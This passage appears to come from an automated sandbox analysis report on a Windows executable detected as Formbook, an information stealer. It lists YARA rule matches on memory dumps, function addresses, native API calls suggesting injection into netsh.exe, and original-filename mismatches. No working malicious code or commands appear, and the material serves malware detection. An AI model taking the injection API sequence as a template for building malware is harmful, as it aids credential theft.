Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_008E5C24	0_2_008E5C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_02B98250	0_2_02B98250
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_02B9D2F8	0_2_02B9D2F8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 1_2_002F5C24	1_2_002F5C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041BC78	2_2_0041BC78
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00408C7B	2_2_00408C7B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00408C80	2_2_00408C80
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041BD01	2_2_0041BD01
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041BEE0	2_2_0041BEE0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041CFB6	2_2_0041CFB6
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00565C24	2_2_00565C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01004120	2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00FFB090	2_2_00FFB090
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010A1002	2_2_010A1002
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010120A0	2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B20A8	2_2_010B20A8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B28EC	2_2_010B28EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00FEF900	2_2_00FEF900
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B2B28	2_2_010B2B28
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0101EBB0	2_2_0101EBB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010ADBD2	2_2_010ADBD2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B22AE	2_2_010B22AE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B2D07	2_2_010B2D07
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B1D55	2_2_010B1D55
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01012581	2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B25DD	2_2_010B25DD
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00FF841F	2_2_00FF841F
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00FFD5E0	2_2_00FFD5E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010AD466	2_2_010AD466
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00FE0D20	2_2_00FE0D20
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B1FF1	2_2_010B1FF1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010AD616	2_2_010AD616
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01006E30	2_2_01006E30
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010B2EF7	2_2_010B2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0388DBD2	12_2_0388DBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03892B28	12_2_03892B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037FEBB0	12_2_037FEBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038922AE	12_2_038922AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037E4120	12_2_037E4120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037CF900	12_2_037CF900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038920A8	12_2_038920A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038928EC	12_2_038928EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03881002	12_2_03881002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0389E824	12_2_0389E824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037F20A0	12_2_037F20A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037DB090	12_2_037DB090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03891FF1	12_2_03891FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037E6E30	12_2_037E6E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03892EF7	12_2_03892EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0388D616	12_2_0388D616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038925DD	12_2_038925DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037C0D20	12_2_037C0D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03892D07	12_2_03892D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037DD5E0	12_2_037DD5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03891D55	12_2_03891D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037F2581	12_2_037F2581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_037D841F	12_2_037D841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0388D466	12_2_0388D466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDBEE0	12_2_02DDBEE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDCFB6	12_2_02DDCFB6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DC2FB0	12_2_02DC2FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DC8C80	12_2_02DC8C80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDBC78	12_2_02DDBC78
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DC8C7B	12_2_02DC8C7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DC2D90	12_2_02DC2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDBD01	12_2_02DDBD01

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: String function: 00FEB150 appears 35 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 037CB150 appears 35 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_004185E0 NtCreateFile,	2_2_004185E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00418690 NtReadFile,	2_2_00418690
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00418710 NtClose,	2_2_00418710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_004187C0 NtAllocateVirtualMemory,	2_2_004187C0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_004185DA NtCreateFile,	2_2_004185DA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041870C NtReadFile,NtClose,	2_2_0041870C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_004187BA NtAllocateVirtualMemory,	2_2_004187BA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01029910
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010299A0 NtCreateSection,LdrInitializeThunk,	2_2_010299A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029840 NtDelayExecution,LdrInitializeThunk,	2_2_01029840
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01029860
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_010298F0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01029A00
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029A20 NtResumeThread,LdrInitializeThunk,	2_2_01029A20
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029A50 NtCreateFile,LdrInitializeThunk,	2_2_01029A50
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029540 NtReadFile,LdrInitializeThunk,	2_2_01029540
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010295D0 NtClose,LdrInitializeThunk,	2_2_010295D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01029710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01029780
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_010297A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029FE0 NtCreateMutant,LdrInitializeThunk,	2_2_01029FE0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01029660
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_010296E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029950 NtQueueApcThread,	2_2_01029950
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010299D0 NtCreateProcessEx,	2_2_010299D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029820 NtEnumerateKey,	2_2_01029820
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0102B040 NtSuspendThread,	2_2_0102B040
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010298A0 NtWriteVirtualMemory,	2_2_010298A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029B00 NtSetValueKey,	2_2_01029B00
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0102A3B0 NtGetContextThread,	2_2_0102A3B0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029A10 NtQuerySection,	2_2_01029A10
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029A80 NtOpenDirectoryObject,	2_2_01029A80
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029520 NtWaitForSingleObject,	2_2_01029520
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0102AD30 NtSetContextThread,	2_2_0102AD30
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029560 NtWriteFile,	2_2_01029560
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010295F0 NtQueryInformationFile,	2_2_010295F0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0102A710 NtOpenProcessToken,	2_2_0102A710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029730 NtQueryVirtualMemory,	2_2_01029730
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029760 NtOpenProcess,	2_2_01029760
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0102A770 NtOpenThread,	2_2_0102A770
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029770 NtSetInformationFile,	2_2_01029770
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029610 NtEnumerateValueKey,	2_2_01029610
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029650 NtQueryValueKey,	2_2_01029650
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_01029670 NtQueryInformationProcess,	2_2_01029670
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_010296D0 NtCreateKey,	2_2_010296D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809A50 NtCreateFile,LdrInitializeThunk,	12_2_03809A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038099A0 NtCreateSection,LdrInitializeThunk,	12_2_038099A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_03809910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809840 NtDelayExecution,LdrInitializeThunk,	12_2_03809840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,	12_2_03809860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809780 NtMapViewOfSection,LdrInitializeThunk,	12_2_03809780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809FE0 NtCreateMutant,LdrInitializeThunk,	12_2_03809FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809710 NtQueryInformationToken,LdrInitializeThunk,	12_2_03809710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038096D0 NtCreateKey,LdrInitializeThunk,	12_2_038096D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_038096E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038095D0 NtClose,LdrInitializeThunk,	12_2_038095D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809540 NtReadFile,LdrInitializeThunk,	12_2_03809540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0380A3B0 NtGetContextThread,	12_2_0380A3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809B00 NtSetValueKey,	12_2_03809B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809A80 NtOpenDirectoryObject,	12_2_03809A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809A00 NtProtectVirtualMemory,	12_2_03809A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809A10 NtQuerySection,	12_2_03809A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809A20 NtResumeThread,	12_2_03809A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038099D0 NtCreateProcessEx,	12_2_038099D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809950 NtQueueApcThread,	12_2_03809950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038098A0 NtWriteVirtualMemory,	12_2_038098A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038098F0 NtReadVirtualMemory,	12_2_038098F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809820 NtEnumerateKey,	12_2_03809820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0380B040 NtSuspendThread,	12_2_0380B040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038097A0 NtUnmapViewOfSection,	12_2_038097A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0380A710 NtOpenProcessToken,	12_2_0380A710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809730 NtQueryVirtualMemory,	12_2_03809730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809760 NtOpenProcess,	12_2_03809760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0380A770 NtOpenThread,	12_2_0380A770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809770 NtSetInformationFile,	12_2_03809770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809610 NtEnumerateValueKey,	12_2_03809610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809650 NtQueryValueKey,	12_2_03809650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809660 NtAllocateVirtualMemory,	12_2_03809660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809670 NtQueryInformationProcess,	12_2_03809670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_038095F0 NtQueryInformationFile,	12_2_038095F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809520 NtWaitForSingleObject,	12_2_03809520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0380AD30 NtSetContextThread,	12_2_0380AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_03809560 NtWriteFile,	12_2_03809560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD8690 NtReadFile,	12_2_02DD8690
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD8710 NtClose,	12_2_02DD8710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD85E0 NtCreateFile,	12_2_02DD85E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD870C NtReadFile,NtClose,	12_2_02DD870C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD85DA NtCreateFile,	12_2_02DD85DA

Sample file is different than original file name gathered from version info

Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.358021001.0000000003BDD000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000000.342497076.0000000000950000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.359712250.0000000005B10000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.360053021.00000000060A0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000001.00000000.351201212.0000000000360000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000000.354123685.00000000005D0000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434893300.0000000002FCC000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434541337.000000000126F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe	Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe

Source: cK1g5gckZR9VHjj.exe

